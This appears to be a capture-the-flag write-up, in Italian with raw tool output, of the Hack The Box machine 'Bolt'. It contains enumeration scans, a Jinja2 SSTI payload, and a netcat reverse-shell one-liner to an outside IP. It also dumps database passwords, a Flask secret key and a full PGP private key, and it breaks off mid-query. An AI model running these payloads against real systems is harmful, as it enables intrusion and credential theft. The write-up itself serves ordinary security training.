Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 04:53 CEST Nmap scan report for bolt (10.129.119.38) Host is up (0.056s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA) | 256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA) |_ 256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Starter Website - About |_http-server-header: nginx/1.18.0 (Ubuntu) 443/tcp open ssl/http nginx 1.18.0 (Ubuntu) | http-title: Passbolt | Open source password manager for teams |_Requested resource was /auth/login?redirect=%2F |_http-server-header: nginx/1.18.0 (Ubuntu) | ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stat eOrProvinceName=Some-State/countryName=AU | Not valid before: 2021-02-24T19:11:23 |_Not valid after: 2022-02-24T19:11:23 |_ssl-date: TLS randomness does not represent time Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 04:53 CEST Nmap scan report for bolt (10.129.119.38) Host is up (0.059s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds
============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://bolt.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/leo/repos/SecLists/Discovery/DNS/subdomains-top1million-110000.txt [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/03/31 05:05:22 Starting gobuster in VHOST enumeration mode =============================================================== Found: mail.bolt.htb (Status: 200) [Size: 4943] Found: demo.bolt.htb (Status: 302) [Size: 219] Progress: 2643 / 114442 (2.31%) ^C [!] Keyboard interrupt detected, terminating. panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x773b15] goroutine 26 [running]: github.com/OJ/gobuster/gobustervhost.(*GobusterVhost).Run(0xc000012840, 0xc00001b100, 0x8, 0xc000064240, 0x1, 0x0) github.com/OJ/gobuster/gobustervhost/gobustervhost.go:125 +0x255 github.com/OJ/gobuster/libgobuster.(*Gobuster).worker(0xc0000128a0, 0xc000090300, 0xc0000aa080) github.com/OJ/gobuster/libgobuster/libgobuster.go:91 +0x1de created by github.com/OJ/gobuster/libgobuster.(*Gobuster).Start github.com/OJ/gobuster/libgobuster/libgobuster.go:158 +0x16a
Enumerando i file ottenuti scaricando image.tar
dal sito
http://bolt ho trovato la cartella
41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/app/base
che contiene il file app/base/routes.py
, e, in particolare, nel
metodo register()
è presente il seguente codice di invito
hard-coded
XNSS-HSJW-3NGU-8XTJ
come possiamo vedere dal codice della funzione, mettendo questo codice siamo in grado di iscriverci alla piattaforma.
@blueprint.route('/register', methods=['GET', 'POST']) def register(): login_form = LoginForm(request.form) create_account_form = CreateAccountForm(request.form) if 'register' in request.form: username = request.form['username'] email = request.form['email' ] code = request.form['invite_code'] if code != 'XNSS-HSJW-3NGU-8XTJ': return render_template('code-500.html') data = User.query.filter_by(email=email).first() if data is None and code == 'XNSS-HSJW-3NGU-8XTJ': # Check usename exists user = User.query.filter_by(username=username).first() if user: return render_template( 'accounts/register.html', msg='Username already registered', success=False, form=create_account_form) # Check email exists user = User.query.filter_by(email=email).first() if user: return render_template( 'accounts/register.html', msg='Email already registered', success=False, form=create_account_form) # else we can create the user user = User(**request.form) db.session.add(user) db.session.commit() return render_template( 'accounts/register.html', msg='User created please <a href="/login">login</a>', success=True, form=create_account_form) else: return render_template( 'accounts/register.html', form=create_account_form)
Modificando il profilo dell'utente in demo.bolt.htb
, e
successivamente, confermando in mail.bolt.htb
siamo in grado di
ottenere una RCE tramite una SSTI con il seguente payload
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
Per una reverse shell eseguiamo il seguente payload
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.5 4321 >/tmp/f ').read() }}
cat config.py """Flask Configuration""" #SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db' SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail' SQLALCHEMY_TRACK_MODIFICATIONS = True SECRET_KEY = 'kreepandcybergeek' MAIL_SERVER = 'localhost' MAIL_PORT = 25 MAIL_USE_TLS = False MAIL_USE_SSL = False #MAIL_DEBUG = app.debug MAIL_USERNAME = None MAIL_PASSWORD = None DEFAULT_MAIL_SENDER = 'support@bolt.htb'
$config['db_dsnw'] = 'mysql://roundcubeuser:WXg5He2wHt4QYHuyGET@localhost/roundcube';
cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin saned:x:117:123::/var/lib/saned:/usr/sbin/nologin nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false whoopsie:x:120:125::/nonexistent:/bin/false colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin vboxadd:x:998:1::/var/run/vboxadd:/bin/false sshd:x:126:65534::/run/sshd:/usr/sbin/nologin mysql:x:127:133:MySQL Server,,,:/nonexistent:/bin/false clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash postfix:x:128:134::/var/spool/postfix:/usr/sbin/nologin vmail:x:5000:5000::/var/mail:/usr/bin/nologin dovecot:x:129:136:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin dovenull:x:130:137:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
root 454 0.0 0.0 85132 288 ? Ssl 20:36 0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid root 518 0.0 0.0 0 0 ? I< 20:36 0:00 [cryptd] systemd+ 559 0.0 0.1 90260 5980 ? Ssl 20:36 0:00 /lib/systemd/systemd-timesyncd root 562 0.0 0.0 0 0 ? I< 20:36 0:00 [nfit] root 592 0.0 0.2 58776 10508 ? Ss 20:36 0:00 /usr/bin/VGAuthService root 599 0.0 0.0 2548 716 ? Ss 20:36 0:00 /usr/sbin/acpid avahi 607 0.0 0.0 8532 3440 ? Ss 20:36 0:01 avahi-daemon: running [bolt.local] root 612 0.0 0.0 18052 2968 ? Ss 20:36 0:00 /usr/sbin/cron -f message+ 619 0.0 0.1 7924 4716 ? Ss 20:36 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 622 0.0 0.4 270316 18940 ? Ssl 20:36 0:00 /usr/sbin/NetworkManager --no-daemon root 635 0.0 0.1 99904 6004 ? Ssl 20:36 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leas root 641 0.0 0.0 81968 3608 ? Ssl 20:36 0:00 /usr/sbin/irqbalance --foreground root 642 0.0 0.5 47968 20092 ? Ss 20:36 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 645 0.0 0.1 232724 6684 ? Ssl 20:36 0:00 /usr/lib/policykit-1/polkitd --no-debug syslog 659 0.0 0.1 224328 5228 ? Ssl 20:36 0:00 /usr/sbin/rsyslogd -n -iNONE root 673 0.0 0.1 16484 5504 ? Ss 20:36 0:00 /lib/systemd/systemd-logind root 675 0.0 0.1 13688 4844 ? Ss 20:36 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant root 683 0.1 0.2 249016 8524 ? Ssl 20:36 0:07 /usr/bin/vmtoolsd avahi 687 0.0 0.0 8352 324 ? S 20:36 0:00 avahi-daemon: chroot helper root 761 0.0 0.2 314448 10876 ? Ssl 20:36 0:00 /usr/sbin/ModemManager systemd+ 834 0.0 0.3 24056 12888 ? Ss 20:36 0:00 /lib/systemd/systemd-resolved www-data 897 0.0 0.5 41296 22424 ? Ss 20:36 0:00 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app root 898 0.0 0.0 4544 3356 ? Ss 20:36 0:00 /usr/sbin/dovecot -F www-data 899 0.0 0.5 41296 22412 ? Ss 20:36 0:00 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app root 903 0.0 0.9 251708 38204 ? Ss 20:36 0:00 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf) whoopsie 910 0.0 0.3 400564 15572 ? Ssl 20:36 0:00 /usr/bin/whoopsie -f kernoops 915 0.0 0.0 11264 452 ? Ss 20:36 0:00 /usr/sbin/kerneloops --test root 922 0.0 0.1 12184 7316 ? Ss 20:36 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups dovecot 930 0.0 0.0 4256 1128 ? S 20:36 0:00 dovecot/anvil root 931 0.0 0.0 4396 2984 ? S 20:36 0:00 dovecot/log root 933 0.0 0.1 5684 4172 ? S 20:36 0:00 dovecot/config kernoops 934 0.0 0.0 11264 452 ? Ss 20:36 0:00 /usr/sbin/kerneloops root 940 0.0 0.0 65664 1672 ? Ss 20:36 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on; www-data 942 0.0 0.2 66772 8772 ? S 20:36 0:00 nginx: worker process www-data 943 0.0 0.2 67204 9000 ? S 20:36 0:02 nginx: worker process root 944 0.0 0.0 17068 1828 tty1 Ss+ 20:36 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux www-data 954 0.0 1.0 252868 43084 ? S 20:36 0:01 php-fpm: pool www www-data 955 0.0 1.0 252860 43468 ? S 20:36 0:00 php-fpm: pool www mysql 1010 0.3 10.2 1759136 407364 ? Ssl 20:36 0:14 /usr/sbin/mysqld www-data 1059 0.1 1.1 78448 44380 ? S 20:36 0:05 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app root 1273 0.0 0.0 38044 3416 ? Ss 20:36 0:00 /usr/lib/postfix/sbin/master -w postfix 1274 0.0 0.1 38312 5212 ? S 20:36 0:00 pickup -l -t unix -u -c postfix 1275 0.0 0.1 38508 5316 ? S 20:36 0:00 qmgr -l -t unix -u www-data 2070 0.0 0.0 78236 884 ? Ss 20:53 0:00 gpg-agent --homedir /var/lib/passbolt/.gnupg --use-standard-socket --daemon dovecot 2483 0.0 0.0 4392 2864 ? S 21:08 0:00 dovecot/stats root 2550 0.0 0.0 0 0 ? I 21:09 0:00 [kworker/1:0-events] dovecot 3022 0.0 0.1 20304 7968 ? S 21:31 0:00 dovecot/auth root 3047 0.0 0.0 0 0 ? I 21:32 0:00 [kworker/0:0-events] root 3349 0.0 0.0 0 0 ? I 21:39 0:00 [kworker/1:1-mm_percpu_wq] root 3352 0.0 0.0 0 0 ? I 21:39 0:00 [kworker/u256:1-ext4-rsv-conversion] root 3513 0.0 0.0 0 0 ? I 21:44 0:00 [kworker/u256:0-events_unbound] www-data 3682 0.0 0.0 2616 540 ? S 21:49 0:00 /bin/sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.5 4321 >/tmp/f www-data 3685 0.0 0.0 16860 588 ? S 21:49 0:00 cat /tmp/f www-data 3686 0.0 0.0 2616 604 ? S 21:49 0:00 /bin/sh -i www-data 3687 0.0 0.0 3340 2004 ? S 21:49 0:00 /bin/nc 10.10.14.5 4321 www-data 3689 0.0 0.2 26384 8944 ? S 21:49 0:00 python3 -c import pty; pty.spawn("/bin/bash") www-data 3690 0.0 0.1 18476 3992 pts/0 Ss 21:49 0:00 /bin/bash www-data 3692 0.0 0.9 67480 38708 ? S 21:49 0:00 /usr/bin/python3 /usr/local/bin/gunicorn wsgi:app root 3823 0.0 0.2 20476 10084 ? S 21:53 0:00 dovecot/auth -w www-data 3853 0.0 0.0 20132 3240 pts/0 R+ 21:54 0:00 ps aux
find / -name "passbolt" 2>/dev/null /etc/passbolt /usr/share/php/passbolt /usr/share/passbolt /var/lib/passbolt /var/log/passbolt
'App' => [ // A base URL to use for absolute links. // The url where the passbolt instance will be reachable to your end users. // This information is need to render images in emails for example 'fullBaseUrl' => 'https://passbolt.bolt.htb', ], // Database configuration. 'Datasources' => [ 'default' => [ 'host' => 'localhost', 'port' => '3306', 'username' => 'passbolt', 'password' => 'rT2;jW7<eY8!dX8}pQ8%', 'database' => 'passboltdb', ], ],
./.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js:27039:const PRIVATE_HEADER = '-----BEGIN PGP PRIVATE KEY BLOCK-----'; ./.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js:32409: result.push("-----BEGIN PGP PRIVATE KEY BLOCK-----\r\n"); Binary file ./.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log matches ./private.key:1:-----BEGIN PGP PRIVATE KEY BLOCK-----
"passbolt-private-gpgkeys":"{\"MY_KEY_ID\":{\"key\":\"-----BEGIN PGP PRIVATE KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\n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\\r\\nPSwYYWlAywj5\\r\\n=cqxZ\\r\\n-----END PGP PRIVATE KEY BLOCK-----\\r\\n\"
mysql -u passbolt -h localhost -p
da utilizzare con la seguente password
rT2;jW7<eY8!dX8}pQ8%
select * from users; +--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+ | id | role_id | username | active | deleted | created | modified | +--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+ | 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | eddie@bolt.htb | 1 | 0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 | | 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | clark@bolt.htb | 1 | 0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 | +--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+ 2 rows in set (0.00 sec)
show tables; +-----------------------+ | Tables_in_passboltdb | +-----------------------+ | account_settings | | action_logs | | actions | | authentication_tokens | | avatars | | comments | | email_queue | | entities_history | | favorites | | gpgkeys | | groups | | groups_users | | organization_settings | | permissions | | permissions_history | | phinxlog | | profiles | | resource_types | | resources | | roles | | secret_accesses | | secrets | | secrets_history | | user_agents | | users | +-----------------------+ 25 rows in set (0.00 sec)
#+begin_example select * from gpgkeys\G
id: 2d9d331a-9c6d-4f7a-a423-27fed47176c9 user_id: 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 armored_key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: OpenPGP.js v4.10.9 Comment: https://openpgpjs.org
xsBNBGA4GX0BCAD2MdBV19tAu+SWkMJ0BkvGdQrLquHg1olUvvhvIWmmBICr eA89HnYYKFoOxnCL1yhpArtf379rFTZJDXzbzXlnCvgZzP71MNYo2Pq3l0Zn syfx3juIg+Fr6YYv7RotnpNaz+xFU+eHVSFRl64o+WhuxETPyJKqpRGGYjrl WiQQP8oCGSh5ytXqK/XRswETTQEQUTkeWHVU5UV6KlYp+xL0vmu8R9UAkcrK Go9QusV+v4i3PMsgHexuOFHXVJ5nmyGvVQ5khNtuNHruQ5M3xjsb8FtklIo1 asfbjJETUti0wYf7lOffU3+0win4uDbMDOUJEU1ZV//Z+OZq+ARBWaahABEB AAHNH0NsYXJrIEdyaXN3b2xkIDxjbGFya0Bib2x0Lmh0Yj7CwI0EEAEIACAF AmA4GX0GCwkHCAMCBBUICgIEFgIBAAIZAQIbAwIeAQAhCRBY7n73qDZg6hYh BA0fEAb51vFT6RQogFjufveoNmDqjx8IAI+HW1qYWqFhO5VdgDjZLlyFzQgh CPMjix05N8U6umsy31m0U8OaDCwN+s0S5DAz0e5OSJEF/gNVM/iTP8Ac+gwo H2kIEUZ6cPMLgV1kwiGAQUr/Fn0biCmKQo36luQphSdT1Gbv+fOpcrLFh+bZ EndJIgKdovUrr3eo7gyJhALzrYz9PinypoQPs6t3PXKbRWdhHulQuBZPUavH 2g6knhGnx8P2XGEbELGh2NmmB9K1B9vpjxpGokZGiVXAA00/T4rj22/fXHJO XXFzSjoIpnPCjBozgeWtiwDwD5zFh4rg7NkcyZFwg2BZo3fFKXBENWlOIy9b ejRn7ea1iTbK4BLOwE0EYDgZfQEIALhlzquF2jgQJkBFUC0PvpaYBNMtinA5 SiA+rKMs+qhsfJf9whelroGL4znwOw4yI+gCIdiX+qlGyxPD1LXVCHWyaTA3 fiivImGkEXV2pP3CvBjtzsYv4g9rlrXmoOrhwnhJUxcq/0D8HinpbIwQ8euM jTCfLVCBPOLham/D/j7QLydZ0flA+z3SKJMrbx5MlhlGj2PwxWdOLII7xTol 1B7F5WUz/ILKhCkzSliiRAHJhQNlgZHV3bCHGR1YUDf30pvn9GEwbOE2DdUv K9Mvu5Ow5PLC+EHv1Ve21bfKTE8sQbkhF7qaxoX3C47DReze7LGidk+DIPJx Gw2JeW/EukUAEQEAAcLAdgQYAQgACQUCYDgZfQIbDAAhCRBY7n73qDZg6hYh BA0fEAb51vFT6RQogFjufveoNmDqkwgH/Aup4vqEXUxqciTyIZUDctPY1I2v dwcMS1J9sjW8UOy3XzkgG2+ysME09fzODTM/zwpGEQf8icUvMOq70NMeUDed BnnVHlgwgn4W10xh8p6z24yBrU0iwRianGMX9bIzToHkxwhaj8AtQP5cXoZi x8/MFj+LswTfZDAP10CkgS4L3bsi7nIrh3sHMPjn2RYLIVXffWTDC4TJ2HV5 IadG59FrSdK+n8vXPNPcYUcm1F6ddDGvsxjBNwCX00jDNL3Gp7fPqKQjQCh0 pMIO+51kn9QRJJP/XmJrOw2mTheT20DT26JX/K947oi/pAe8xGHrCKAqWiZ5 AeAgt0l0AiCdPTQ= =axZz -----END PGP PUBLIC KEY BLOCK-----
bits: 2048
uid: Clark Griswold
id: 929a2417-55d8-41fb-b0ce-b1b49839c5f2 user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc armored_key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: OpenPGP.js v4.10.9 Comment: https://openpgpjs.org
